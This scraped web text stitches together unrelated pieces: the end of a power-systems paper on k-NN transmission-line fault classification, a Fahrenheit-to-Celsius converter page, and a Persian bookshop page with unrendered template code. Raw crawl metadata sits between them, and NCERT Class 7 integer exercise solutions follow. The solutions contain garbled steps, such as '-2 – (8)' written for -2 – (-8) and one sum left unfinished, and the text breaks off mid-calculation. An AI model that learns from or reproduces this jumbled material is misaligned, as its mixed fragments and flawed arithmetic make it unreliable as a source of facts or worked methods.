location of 80% of the transmission line 1–2. From the results, one can observe that the performance of the proposed method is preserved in different load levels.\n\n### Case 9: Current transformer saturation\n\nThe performance of the method is also evaluated during current transformer saturation. Two typical cases are considered. The faults are solid type and applied at an identical inception instant 0.2345 s. The classification criteria for both cases are shown in Fig. 6 and Table 7. It is observed that the proposed method is able to classify the faults during current transformer saturation.\n\n## A comparison with other techniques\n\nThe performance of the proposed method is compared with six other similar approaches in this Section. All of the methods are evaluated using an identical data set in similar conditions. The six methods are briefly reviewed as follows:\n\na. Sequence Component : This technique classifies the faults using the phase differences between positive and negative sequences. Also, relative magnitudes of negative and zero sequences from pre-fault to the fault stage are used to distinguish between phase-to-phase (LL) and phase-to-phase-to-ground (LLg) faults.\n\nb. Alienation Coefficients : In this algorithm, alienation technique is applied to two half successive cycles with the same polarity. The alienation coefficients of the successive cycles as two dependent variables are calculated. This technique is capable of classification using only three-phase current waveforms and its delay time is half cycle of power frequency. Also, another version of this approach is presented in .\n\nc. Discrete Wavelet Transform : Daubechies family of wavelet transform is used in this technique. Third level output among different decomposed levels is used and the summation of detailed current signals for each phase (Sa, Sb, and Sc) is obtained. 
If the summation of Sa, Sb, and Sc is equal to zero, then the fault type is either three-phase or LL, otherwise, it is phase-to-ground (Lg) or LLg fault.\n\nd. Fuzzy Logic : The prerequisite of this technique is fault occurrence time. In this algorithm, using measured current samples, some specific characteristics for the samples are defined for the fault classification. The technique takes three quarters of a cycle to classify the fault.\n\ne. Using RMS Values of current: A simple approach to classify the faults is based on comparing the RMS values of three-phase current waveforms with a certain threshold. The RMS values of the phases are obtained using Fourier transform in a half cycle window after fault occurrence. Discrimination between LL and LLg is determined using zero sequence component of current, which is large for LLg and zero for LL.\n\nf. Using RMS Values of Voltage: This technique is exactly the same as previous method for three-phase voltage signals. Type of fault is determined when the RMS values of the voltages become less than a certain threshold.\n\nThe performance of the proposed method is compared with the above-mentioned methods based on following factors; the results are tabulated in Table 8:\n\n• Fault resistances\n\n• Fault inception instants\n\n• Fault locations\n\n• Generators X/R ratios\n\n• Phase difference between two generators\n\n• Generators short circuit levels\n\n• Delay operation time\n\n• Error percentage\n\nThe number of the whole cases considered in this Section is 410; 200 cases for different fault resistances and inception instants, 50 cases for different fault locations, 70 cases for different sources X/R ratios, 50 cases for different sources angles, and 40 cases for different short circuit levels.\n\nIn Table 8, error percentages for the above mentioned factors are calculated as the ratio of number of mal-function operations to number of the relevant cases. Then, total error percentage for each method is calculated as ratio of number of whole mal-function operations to number of whole the cases.\n\nTechniques a and d have a delay time 15 ms and techniques b, c, e, and f have a delay time 10 ms. Among the methods with delay time 15 ms, fuzzy logic has a very good performance with only 0.49% error.\n\nThe proposed technique has a good performance with error percentage of 1.95% and average delay time of 15 ms. Based on the calculated total error percentage and delay time, it is confirmed that the proposed method has acceptable performance in comparison with other methods.\n\n## Conclusion\n\nTwo simple methods for fault detection and classification are presented in this paper. The methods are based on k-NN algorithm. Plenty of simulations were used in order to evaluate the performance of the methods. The performance of the proposed classification method is compared with six other similar methods. From the results, the good accuracy and speed of the methods are confirmed. The classification technique has accuracy about 98% for the considered data set with 15 ms average delay time.\n\n## References\n\n1. Chowdhury, F. N., Christensen, J. P., & Aravena, J. L. (1991). Power system fault detection and state estimation using Kalman filter with hypothesis testing. IEEE Transactions on Power Delivery, 6(3), 1025–1030.\n\n2. Öhrström, M., & Söder, L. (2002). Fast fault detection for power distribution systems. Power and energy systems (PES), Marina del Rey, USA, may 13–15.\n\n3. Magnago, F. H., & Abur, A. (1999). 
A new fault location technique for radial distribution systems based on high frequency signals. IEEE in Power Engineering Society Summer Meeting, 1, 426–431.\n\n4. Xiangjun, Z., Yuanyuan, W., Yao, X. (2010). Faults detection for power systems. INTECH Open Access Publisher. In W. Zhang (E.d.), Fault Detection (pp. 512). InTech. ISBN 978-953-307-037-7. doi:10.5772/56395. https://www.intechopen.com/books/fault-detection\n\n5. Gopakumar, P., Reddy, M. J. B., & Mohanta, D. K. (2015). Transmission line fault detection and localisation methodology using PMU measurements. Journal of IET, Generation, Transmission & Distribution, 9(11), 1033–1042.\n\n6. Bezerra Costa, F. (2014). Fault-induced transient detection based on real-time analysis of the wavelet coefficient energy. IEEE Transactions on Power Delivery, 29(1), 140–153.\n\n7. Haghifam, M. R., Sedighi, A. R., & Malik, O. P. (2006). Development of a fuzzy inference system based on genetic algorithm for high-impedance fault detection. Journal of IEE Proceedings-Generation, Transmission and Distribution, 153(3), 359–367.\n\n8. Baqui, I., Zamora, I., Mazón, J., & Buigues, G. (2011). High impedance fault detection methodology using wavelet transform and artificial neural networks. Journal of Electric Power Systems Research, 81(7), 1325–1333.\n\n9. Shaik, A. G., & Pulipaka, R. R. V. (2015). A new wavelet based fault detection, classification and location in transmission lines. International Journal of Electrical Power & Energy Systems, 64, 35–40.\n\n10. Torabi, N., Karrari, M., Menhaj, M. B., Karrari, S. (2012). 'Wavelet Based Fault Classification for Partially Observable Power Systems. IEEE, In Asia-Pacific Power and Energy Engineering Conference (APPEEC) (pp. 1–6).\n\n11. Usama, Y., Lu, X., Imam, H., Sen, C., & Kar, N. (2013). Design and implementation of a wavelet analysis-based shunt fault detection and identification module for transmission lines application. IET Journal of Generation, Transmission & Distribution, 8(3), 431–444.\n\n12. Guillen, D., Arrieta Paternina, M. R., Zamora, A., Ramirez, J. M., & Idarraga, G. (2015). Detection and classification of faults in transmission lines using the maximum wavelet singular value and Euclidean norm. IET Journal of Generation, Transmission & Distribution, 9(15), 2294–2302.\n\n13. Liu, Z., Han, Z., Zhang, Y., & Zhang, Q. (2014). Multiwavelet packet entropy and its application in transmission line fault recognition and classification. IEEE Transactions on Neural Networks and Learning Systems, 25(11), 2043–2052.\n\n14. Dash, P. K., Das, S., & Moirangthem, J. (2015). Distance protection of shunt compensated transmission line using a sparse S-transform. IET Journal of Generation, Transmission & Distribution, 9(12), 1264–1274.\n\n15. Girgis, A., & Makram, E. B. (1988). Application of adaptive Kalman filtering in fault classification, distance protection, and fault location using microprocessors. IEEE Transactions on Power Systems, 3(1), 301–309.\n\n16. Adu, T. (2002). An accurate fault classification technique for power system monitoring devices. IEEE Transactions on Power Delivery, 17(3), 684–690.\n\n17. Rahmati, A., & Adhami, R. (2014). A fault detection and classification technique based on sequential components. IEEE Transactions on Industry Applications, 50(6), 4202–4209.\n\n18. Esmaeilian, A., & Kezunovic, M. (2014). Transmission-line fault analysis using synchronized sampling. IEEE Transactions on Power Delivery, 29(2), 942–950.\n\n19. Butler, K. L., Momoh, J. (1993). 
Detection and classification of line faults on power distribution systems using neural networks. IEEE Proceedings of the 36th Midwest Symposium, In Circuits and Systems. (pp. 368–371).\n\n20. Upendar, J., Gupta, C. P., Singh, G. K. (2008). ANN based power system fault classification. IEEE, In Region 10 Conference (TENCON), November, (pp. 1–6).\n\n21. Tayeb, E. B. M., Rhim, O. A. A. A. (2011). Transmission line faults detection, classification and location using artificial neural network. IEEE, international conference, utility exhibition on power and energy systems: Issues & prospects for Asia (ICUE), September.\n\n22. Mahanty, R. N., & Gupta, P. D. (2007). A fuzzy logic based fault classification approach using current samples only. Journal of Electric power systems research, 77(5), 501–507.\n\n23. Reddy, M. J., & Mohanta, D. K. (2007). A wavelet-fuzzy combined approach for classification and location of transmission line faults. International Journal of Electrical Power & Energy Systems, 29(9), 669–678.\n\n24. Shahid, N., Aleem, S. A., Naqvi, I. H., Zaffar, N. (2012). Support vector machine based fault detection & classification in smart grids. IEEE, In Globecom Workshops (GC Wkshps), December, (pp. 1526–1531).\n\n25. Livani, H., Evrenosoğlu, C. Y. (2012). A fault classification method in power systems using DWT and SVM classifier. IEEE PES, In Transmission and Distribution Conference and Exposition (T&D), May, 1–5.\n\n26. Moravej, Z., Pazoki, M., & Khederzadeh, M. (2015). New pattern-recognition method for fault analysis in transmission line with UPFC. IEEE Transactions on Power Delivery, 30(3), 1231–1242.\n\n27. Swetapadma, A., & Yadav, A. (2015). Data-mining-based fault during power swing identification in power transmission system. Journal of IET Science, Measurement & Technology, 10(2), 130–139.\n\n28. Masoud, M. E., & Mahfouz, M. M. A. (2010). Protection scheme for transmission lines based on alienation coefficients for current signals. IET Journal of Generation, transmission & distribution, 4(11), 1236–1244.\n\n29. Samet, H., Shabanpour-Haghighi, A., & Ghanbari, T. (2017). A fault classification technique for transmission lines using an improved alienation coefficients technique. doi:10.1002/etep.2235. http://onlinelibrary.wiley.com/doi/10.1002/etep.2235/abstract.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nAll authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to Haidar Samet.\n\n## Ethics declarations\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n## Rights and permissions\n\nOpen Access This article is distributed under the terms of the Creative Commons Attribution 4.0 International License (http://creativecommons.org/licenses/by/4.0/), which permits unrestricted use, distribution, and reproduction in any medium, provided you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made.\n\nReprints and Permissions", null, "" ]
[ null, "https://pcmp.springeropen.com/track/article/10.1186/s41601-017-0063-z", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89378285,"math_prob":0.90991884,"size":27085,"snap":"2022-40-2023-06","text_gpt3_token_len":6061,"char_repetition_ratio":0.16192164,"word_repetition_ratio":0.054410353,"special_character_ratio":0.23263799,"punctuation_ratio":0.1725057,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97535944,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-01T15:02:22Z\",\"WARC-Record-ID\":\"<urn:uuid:02046cab-3c19-4213-99d0-feeb225e5d2a>\",\"Content-Length\":\"273939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:abaefec2-ecae-44ac-8318-a9d51ba37894>\",\"WARC-Concurrent-To\":\"<urn:uuid:18d4e469-91ba-425f-ac22-b97d9396c7c8>\",\"WARC-IP-Address\":\"146.75.36.95\",\"WARC-Target-URI\":\"https://pcmp.springeropen.com/articles/10.1186/s41601-017-0063-z\",\"WARC-Payload-Digest\":\"sha1:MQXN7I2AEAE4QI5PQWHFVUZJZ2JFKUBG\",\"WARC-Block-Digest\":\"sha1:527KXSKLXL4UNXUVUL4NBLMUG2DWLZ5D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030336674.94_warc_CC-MAIN-20221001132802-20221001162802-00131.warc.gz\"}"}
https://www.vacations.info/metric/f-to-c.php?f=390
[ "#### Convert 390 degrees Fahrenheit to Celsius\n\n##### 390 degrees Fahrenheit = 198.89 degrees Celsius\n Use this calculator to convert 390°f to Celsius. How many degrees Celsius in 390°f? 390°f to degrees Celsius is 198.89°c. How hot is 390°f in Celsius? How cold? Type the information into the input boxes and the degrees in Celsius will update automatically. Once again, 390°f in Celsius is equal to 198.89°c. Some units are rounded.\n\n#### Fahrenheit to Celsius Conversions\n\nFahrenheit\nCelsius\nHow much is 390 in Fahrenheit to Celsius?\n390 degrees in Fahrenheit is 198.88888888889 degrees in Celsius" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7804492,"math_prob":0.8338093,"size":333,"snap":"2019-13-2019-22","text_gpt3_token_len":91,"char_repetition_ratio":0.19148937,"word_repetition_ratio":0.0,"special_character_ratio":0.3003003,"punctuation_ratio":0.14473684,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9916221,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T02:47:08Z\",\"WARC-Record-ID\":\"<urn:uuid:0216e469-0482-4f8d-97ac-f2f9188bf3a6>\",\"Content-Length\":\"5022\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eeee9bb4-d5bd-4d8c-a97f-02259f3fcd32>\",\"WARC-Concurrent-To\":\"<urn:uuid:d8bad522-3fba-4787-8974-62b86a55bedc>\",\"WARC-IP-Address\":\"34.229.141.192\",\"WARC-Target-URI\":\"https://www.vacations.info/metric/f-to-c.php?f=390\",\"WARC-Payload-Digest\":\"sha1:7IENF446VDVEHN3W7HJM35REEY2HUO2W\",\"WARC-Block-Digest\":\"sha1:GJ4ZAH324CW7LVPZFTHJUGIARFVCJJHG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203168.70_warc_CC-MAIN-20190324022143-20190324044143-00275.warc.gz\"}"}
https://e-baketabam.ir/shop/history-geography/P2042-brothers-in-arms-one-legendary-tank-regiment-s-bloody-war-from-d-day-to-ve-day-james-holland.html
[ "", null, "۰\nسبد خرید", null, "هر روز با کتاب‌های بیشتر", null, "# Brothers in Arms: One Legendary Tank Regiment’s Bloody War From D-Day to VE-Day | James Holland\n\nکد محصول: eSHB-1969\n۴۰,۷۸۰ تومان۲۰,۳۹۰ تومان", null, "", null, "", null, "افزودن به سبد خرید\n• درباره کتاب\n• مطالعه راحت\n• بخشی از کتاب\n• نظرات\n•", null, "• ## تخفیف ویژه | اولین سفارش\n\n<% if (product.thumbnail) { %>", null, "<% } %>\n\n### <%- product.title %>\n\n<% if (Array.isArray(product.attributes)) { %>\n<% _.forEach(product.attributes, function(attribute, index) { %>\n• <%- attribute.name %>: <%- attribute.value %>\n• <% }); %>\n<% } %><% if (product.price_label) { %>\n<%- (product.price_label.toString()) %>\n<% } else { %><% if (product.in_stock == 1) { %>\n<% if (product.sale_price) { %><%- (product.price.toString().formatNumber().convertToLocalNumber() + currency_sign) %><%- (product.sale_price.toString().formatNumber().convertToLocalNumber() + currency_sign) %><% } else { %><%- (product.price.toString().formatNumber().convertToLocalNumber() + currency_sign) %><% } %>\n<% } else { %>\nاتمام موجودی\n<% } %><% } %>\n<% if (product.ribbon) { %>\n<%- product.ribbon %>\n<% } %><% if (product.sale_amount) { %><% if (product.in_stock==1) { %>\n<% if (product.sale_type==2) { %> <%- ((product.sale_amount).toString().formatNumber().convertToLocalNumber() + currency_sign) %><% } else { %> <%- (product.sale_amount.toString().formatNumber().convertToLocalNumber()) %> درصد <% } %>\n<% } %><% } %>", null, "رمز عبورتان را فراموش کرده‌اید؟\n\nثبت کلمه عبور خود را فراموش کرده‌اید؟ لطفا شماره همراه یا آدرس ایمیل خودتان را وارد کنید. شما به زودی یک ایمیل یا اس ام اس برای ایجاد کلمه عبور جدید، دریافت خواهید کرد.\n\nبازگشت به بخش ورود\n\nکد دریافتی را وارد نمایید.\n\nبازگشت به بخش ورود\n\n### مشاهده سفارش\n\n<%- order.customer_name.toString() %>\n<%- order.id.toString().convertToLocalNumber() %>\n<%- order.customer_province.toString() %>-<%- order.customer_city.toString() %>-<%- order.customer_address.toString() %>\n<%- order.customer_mobile.toString().convertToLocalNumber() %>\n<%- order.shipping_name.toString() %>\n<%- (Number(order.total_shipping).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- order.payment_method_name.toString() %>\n<%- (Number(order.total).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<% if(order.tracking_number) { %>\n<%- order.tracking_number.toString() %>\n<% } %>\nنام محصول\nتعداد\nقیمت واحد\nقیمت کل\nتخفیف\nقیمت نهایی\n<% \\$.each(products, function(index,product) { %>", null, "<%- product.name %>\n<%- product.quantity %>\n<%- (Number(product.original_price).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- (Number(product.original_price*product.quantity).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- (Number(product.discount).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- (Number(product.total).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<% }); %>\n<% if(!orders.length) { %>\n\nشما هنوز هیچ سفارشی ثبت نکرده‌اید.\n\n<% } else { %>\n• شماره سفارش\nتاریخ سفارش\nپرداخت\nوضعیت\nجمع نهایی\n• <% \\$.each(orders, function(index,order) { %>\n• <%- order.id.toString().convertToLocalNumber() %>" ]
[ null, "https://e-baketabam.ir/uploads/83433fff0fed4ca4ba52b5bd170c3ae6.w_25,h_25,r_k.png", null, "https://e-baketabam.ir/uploads/99028db945bf4bf7a2c8b65ad16c749d.w_210,h_105,r_k.png", null, "https://e-baketabam.ir/uploads/437304dddcf34502861d4e6526b672fe.w_30,h_30,r_k.png", null, "https://e-baketabam.ir/uploads/b796015d438543f18f71c21366dfa1ac.png", null, "https://e-baketabam.ir/uploads/d1fd020fc36742e69af0263a5f7ce165.png", null, "https://e-baketabam.ir/uploads/00c7c4f7d86249c5b10ba3f2828fb326.png", null, "https://e-baketabam.ir/uploads/cfbae728cc5041e29885ebb5b58f52ef.w_1170,h_2071,r_k.png", null, "https://e-baketabam.ir/shop/history-geography/<%- (product.thumbnail.toString().thumb(748, 90)) %>", null, "https://e-baketabam.ir/uploads/339129f1b95741988d4adbdc26e692ab.w_90,h_30,r_k.png", null, "https://e-baketabam.ir/shop/history-geography/<%- product.thumbnail %>", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67309994,"math_prob":0.93426526,"size":9259,"snap":"2022-40-2023-06","text_gpt3_token_len":2721,"char_repetition_ratio":0.103187464,"word_repetition_ratio":0.0025923525,"special_character_ratio":0.21060589,"punctuation_ratio":0.10362998,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9695046,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-27T02:28:32Z\",\"WARC-Record-ID\":\"<urn:uuid:cdc55b44-dfed-4387-83e0-5ff498351ddd>\",\"Content-Length\":\"103644\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c33ffdda-a555-43c7-905e-6e901ac7afc7>\",\"WARC-Concurrent-To\":\"<urn:uuid:ceacc1bb-94f9-4aa9-a811-eb594895a18c>\",\"WARC-IP-Address\":\"94.182.110.236\",\"WARC-Target-URI\":\"https://e-baketabam.ir/shop/history-geography/P2042-brothers-in-arms-one-legendary-tank-regiment-s-bloody-war-from-d-day-to-ve-day-james-holland.html\",\"WARC-Payload-Digest\":\"sha1:KLVUIURNM6F2DYEVBMWL23SMX42QEKIP\",\"WARC-Block-Digest\":\"sha1:EBXECYN42HOEVGNG7HELKYTFE364C66J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764494852.95_warc_CC-MAIN-20230127001911-20230127031911-00525.warc.gz\"}"}
https://byjus.com/ncert-solutions-for-class-7-maths-chapter-1-integers-ex-1-1/
[ "", null, "# NCERT Solutions for Class 7 Maths Exercise 1.1 Chapter 1 Integers\n\nNCERT Solutions for Class 7 Maths Exercise 1.1 Chapter 1 Integers in simple PDF are given here. This exercise of NCERT Solutions for Class 7 Chapter 1 contains topics related to the introduction of integers. We know that integers form a bigger collection of numbers, which includes whole numbers and negative numbers. Our expert teachers have formulated these solutions in precise, comprehensive and in a detailed form. Learn more about these topics by solving the questions of NCERT Solutions for Class 7 Maths Chapter 1 Integers with the help of solutions provided here.\n\n## Download the PDF of NCERT Solutions For Class 7 Maths Chapter 1 Integers – Exercise 1.1", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "### Access answers to Maths NCERT Solutions for Class 7 Chapter 1 – Integers Exercise 1.1\n\n1. Following number line shows the temperature in degree celsius (co) at different places on a particular day.", null, "(a) Observe this number line and write the temperature of the places marked on it.\n\nSolution:-\n\nBy observing the number line, we can find the temperature of the cities as follows,\n\nTemperature at the Lahulspiti is -8oC\n\nTemperature at the Srinagar is -2oC\n\nTemperature at the Shimla is 5oC\n\nTemperature at the Ooty is 14oC\n\nTemperature at the Bengaluru is 22oC\n\n(b) What is the temperature difference between the hottest and the coldest places among the above?\n\nSolution:-\n\nFrom the number line we observe that,\n\nThe temperature at the hottest place i.e., Bengaluru is 22oC\n\nThe temperature at the coldest place i.e., Lahulspiti is -8oC\n\nTemperature difference between hottest and coldest place is = 22oC – (-8oC)\n\n= 22oC + 8oC\n\n= 30oC\n\nHence, the temperature difference between the hottest and the coldest place is 30oC.\n\n(c) What is the temperature difference between Lahulspiti and Srinagar?\n\nSolution:-\n\nFrom the given number line,\n\nThe temperature at the Lahulspiti is -8oC\n\nThe temperature at the Srinagar is -2oC\n\n∴The temperature difference between Lahulspiti and Srinagar is = -2oC – (8oC)\n\n= – 2OC + 8oC\n\n= 6oC\n\n(d) Can we say temperature of Srinagar and Shimla taken together is less than the\n\ntemperature at Shimla? Is it also less than the temperature at Srinagar?\n\nSolution:-\n\nFrom the given number line,\n\nThe temperature at Srinagar =-2oC\n\nThe temperature at Shimla = 5oC\n\nThe temperature of Srinagar and Shimla taken together is = – 2oC + 5oC\n\n= 3oC\n\n∴ 5oC > 3oC\n\nSo, the temperature of Srinagar and Shimla taken together is less than the temperature at Shimla.\n\nThen,\n\n3o > -2o\n\nNo, the temperature of Srinagar and Shimla taken together is not less than the temperature of Srinagar.\n\n2. In a quiz, positive marks are given for correct answers and negative marks are given\n\nfor incorrect answers. If Jack’s scores in five successive rounds were 25, – 5, – 10,\n\n15 and 10, what was his total at the end?\n\nSolution:-\n\nFrom the question,\n\nJack’s score in five successive rounds are 25, -5, -10, 15 and 10\n\nThe total score of Jack at the end will be = 25 + (-5) + (-10) + 15 + 10\n\n= 25 – 5 – 10 + 15 + 10\n\n= 50 – 15\n\n= 35\n\n∴Jack’s total score at the end is 35.\n\n3. At Srinagar temperature was – 5°C on Monday and then it dropped by 2°C on Tuesday. What was the temperature of Srinagar on Tuesday? On Wednesday, it rose by 4°C. 
What was the temperature on this day?\n\nSolution:-\n\nFrom the question,\n\nTemperature on Monday at Srinagar = -5oC\n\nTemperature on Tuesday at Srinagar is dropped by 2oC = Temperature on Monday – 2oC\n\n= -5oC – 2oC\n\n= -7oC\n\nTemperature on Wednesday at Srinagar is rose by 4oC = Temperature on Tuesday + 4oC\n\n= -7oC + 4oC\n\n= -3oC\n\nThus, the temperature on Tuesday and Wednesday was -7oC and -3oC respectively.\n\n4. A plane is flying at the height of 5000 m above the sea level. At a particular point, it is exactly above a submarine floating 1200 m below the sea level. What is the vertical distance between them?", null, "Solution:-\n\nFrom the question,\n\nPlane is flying at the height = 5000 m\n\nDepth of Submarine = -1200 m\n\nThe vertical distance between plane and submarine = 5000 m – (- 1200) m\n\n= 5000 m + 1200 m\n\n= 6200 m\n\n5. Mohan deposits ₹ 2,000 in his bank account and withdraws ₹ 1,642 from it, the next day. If withdrawal of amount from the account is represented by a negative integer, then how will you represent the amount deposited? Find the balance in Mohan’s account after the withdrawal.\n\nSolution:-\n\nWithdrawal of amount from the account is represented by a negative integer.\n\nThen, deposit of amount to the account is represented by a positive integer.\n\nFrom the question,\n\nTotal amount deposited in bank account by the Mohan = ₹ 2000\n\nTotal amount withdrawn from the bank account by the Mohan = – ₹ 1642\n\nBalance in Mohan’s account after the withdrawal = amount deposited + amount withdrawn\n\n= ₹ 2000 + (-₹ 1642)\n\n= ₹ 2000 – ₹ 1642\n\n= ₹ 358\n\nHence, the balance in Mohan’s account after the withdrawal is ₹ 358\n\n6. Rita goes 20 km towards east from a point A to the point B. From B, she moves 30 km towards west along the same road. If the distance towards east is represented by a positive integer then, how will you represent the distance travelled towards west? By which integer will you represent her final position from A?", null, "Solution:-\n\nFrom the question, it is given that\n\nA positive integer represents the distance towards the east.\n\nThen, distance travelled towards the west will be represented by a negative integer.\n\nRita travels a distance in east direction = 20 km\n\nRita travels a distance in west direction = – 30 km\n\n∴Distance travelled from A = 20 + (- 30)\n\n= 20 – 30\n\n= -10 km\n\nHence, we will represent the distance travelled by Rita from point A by a negative integer, i.e. – 10 km\n\n7. In a magic square each row, column and diagonal have the same sum. 
Check which of the following is a magic square.", null, "Solution:-\n\nFirst we consider the square (i)\n\nBy adding the numbers in each rows we get,\n\n= 5 + (- 1) + (- 4) = 5 – 1 – 4 = 5 – 5 = 0\n\n= -5 + (-2) + 7 = – 5 – 2 + 7 = -7 + 7 = 0\n\n= 0 + 3 + (-3) = 3 – 3 = 0\n\nBy adding the numbers in each columns we get,\n\n= 5 + (- 5) + 0 = 5 – 5 = 0\n\n= (-1) + (-2) + 3 = -1 – 2 + 3 = -3 + 3 = 0\n\n= -4 + 7 + (-3) = -4 + 7 – 3 = -7 + 7 = 0\n\nBy adding the numbers in diagonals we get,\n\n= 5 + (-2) + (-3) = 5 – 2 – 3 = 5 – 5 = 0\n\n= -4 + (-2) + 0 = – 4 – 2 = -6\n\nBecause sum of one diagonal is not equal to zero,\n\nSo, (i) is not a magic square\n\nNow, we consider the square (ii)\n\nBy adding the numbers in each rows we get,\n\n= 1 + (-10) + 0 = 1 – 10 + 0 = -9\n\n= (-4) + (-3) + (-2) = -4 – 3 – 2 = -9\n\n= (-6) + 4 + (-7) = -6 + 4 – 7 = -13 + 4 = -9\n\nBy adding the numbers in each columns we get,\n\n= 1 + (-4) + (-6) = 1 – 4 – 6 = 1 – 10 = -9\n\n= (-10) + (-3) + 4 = -10 – 3 + 4 = -13 + 4\n\n= 0 + (-2) + (-7) = 0 – 2 – 7 = -9\n\nBy adding the numbers in diagonals we get,\n\n= 1 + (-3) + (-7) = 1 – 3 – 7 = 1 – 10 = -9\n\n= 0 + (-3) + (-6) = 0 – 3 – 6 = -9\n\nThis (ii) square is a magic square, because sum of each row, each column and diagonal is equal to -9.\n\n8. Verify a – (– b) = a + b for the following values of a and b.\n\n(i) a = 21, b = 18\n\nSolution:-\n\nFrom the question,\n\na = 21 and b = 18\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 21 – (- 18)\n\n= 21 + 18\n\n= 39\n\nNow, Right Hand Side (RHS) = a + b\n\n= 21 + 18\n\n= 39\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n39 = 39\n\nHence, the value of a and b is verified.\n\n(ii) a = 118, b = 125\n\nSolution:-\n\nFrom the question,\n\na = 118 and b = 125\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 118 – (- 125)\n\n= 118 + 125\n\n= 243\n\nNow, Right Hand Side (RHS) = a + b\n\n= 118 + 125\n\n= 243\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n243 = 243\n\nHence, the value of a and b is verified.\n\n(iii) a = 75, b = 84\n\nSolution:-\n\nFrom the question,\n\na = 75 and b = 84\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 75 – (- 84)\n\n= 75 + 84\n\n= 159\n\nNow, Right Hand Side (RHS) = a + b\n\n= 75 + 84\n\n= 159\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n159 = 159\n\nHence, the value of a and b is verified.\n\n(iv) a = 28, b = 11\n\nSolution:-\n\nFrom the question,\n\na = 28 and b = 11\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 28 – (- 11)\n\n= 28 + 11\n\n= 39\n\nNow, Right Hand Side (RHS) = a + b\n\n= 28 + 11\n\n= 39\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n39 = 39\n\nHence, the value of a and b is verified.\n\n9. 
Use the sign of >, < or = in the box to make the statements true.\n\n(a) (-8) + (-4) [ ] (-8) – (-4)\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = (-8) + (-4)\n\n= -8 – 4\n\n= -12\n\nNow, Right Hand Side (RHS) = (-8) – (-4)\n\n= -8 + 4\n\n= -4\n\nBy comparing LHS and RHS\n\nLHS < RHS\n\n-12 < -4\n\n∴ (-8) + (-4) [<] (-8) – (-4)\n\n(b) (-3) + 7 – (19) [ ] 15 – 8 + (-9)\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = (-3) + 7 – 19\n\n= -3 + 7 – 19\n\n= -22 + 7\n\n= -15\n\nNow, Right Hand Side (RHS) = 15 – 8 + (-9)\n\n= 15 – 8 – 9\n\n= 15 – 17\n\n= -2\n\nBy comparing LHS and RHS\n\nLHS < RHS\n\n-15 < -2\n\n∴ (-3) + 7 – (19) [<] 15 – 8 + (-9)\n\n(c) 23 – 41 + 11 [ ] 23 – 41 – 11\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = 23 – 41 + 11\n\n= 34 – 41\n\n= – 7\n\nNow, Right Hand Side (RHS) = 23 – 41 – 11\n\n= 23 – 52\n\n= – 29\n\nBy comparing LHS and RHS\n\nLHS > RHS\n\n– 7 > -29\n\n∴ 23 – 41 + 11 [>] 23 – 41 – 11\n\n(d) 39 + (-24) – (15) [ ] 36 + (-52) – (- 36)\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = 39 + (-24) – 15\n\n= 39 – 24 – 15\n\n= 39 – 39\n\n= 0\n\nNow, Right Hand Side (RHS) = 36 + (-52) – (- 36)\n\n= 36 – 52 + 36\n\n= 72 – 52\n\n= 20\n\nBy comparing LHS and RHS\n\nLHS < RHS\n\n0 < 20\n\n∴ 39 + (-24) – (15) [<] 36 + (-52) – (- 36)\n\n(e) – 231 + 79 + 51 [ ] -399 + 159 + 81\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = – 231 + 79 + 51\n\n= – 231 + 130\n\n= -101\n\nNow, Right Hand Side (RHS) = – 399 + 159 + 